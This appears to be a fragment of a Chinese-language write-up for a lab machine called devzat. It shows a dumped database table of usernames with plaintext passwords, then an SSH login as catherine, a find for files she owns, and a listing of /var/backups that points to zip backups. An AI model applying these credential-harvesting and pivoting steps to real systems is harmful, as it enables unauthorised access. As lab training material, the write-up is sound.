{"results":[{"statement_id":0,"series":[{"name":"user","columns":["time","enabled","password","username"],"values":[["2021-06-22T20:04:16.313965493Z",false,"WillyWonka2021","wilhelm"],["2021-06-22T20:04:16.320782034Z",true,"woBeeYareedahc7Oogeephies7Aiseci","catherine"],["2021-06-22T20:04:16.996682002Z",true,"RoyalQueenBee$","charles"]]}]}]}

找到了catherine用户的密码：

catherine:woBeeYareedahc7Oogeephies7Aiseci

ssh catherine@10.10.11.118

catherine -> root

find /var -user catherine 2>/dev/null

在/var/backups目录下找到了两个备份文件devzat-main.zip和devzat-dev.zip

catherine@devzat:/var/backups$ ls -alls -altotal 1132drwxr-xr-x 2 root     root       4096 Dec 23 06:25 .drwxr-xr-x 14 root     root       4096 Jun 22 2021 ..-rw-r--r-- 1 root     root       51200 Dec 23 06:25 alternatives.tar.0-rw-r--r-- 1 root     root       59142 Sep 28 18:45 apt.extended_states.0-rw-r--r-- 1 root     root       6588 Sep 21 20:17 apt.extended_states.1.gz-rw-r--r-- 1 root     root       6602 Jul 16 06:41 apt.extended_states.2.gz-rw------- 1 catherine catherine 28297 Jul 16 07:00 devzat-dev.zip-rw------- 1 catherine catherine 27567 Jul 16 07:00 devzat-main.zip-rw-r--r-- 1 root     root         268 Sep 29 11:46 dpkg.diversions.0-rw-r--r-- 1 root     root         170 Jul 16 06:41 dpkg.statoverride.0-rw-r--r-- 1 root     root     951869 Sep 28 18:45 dpkg.status.0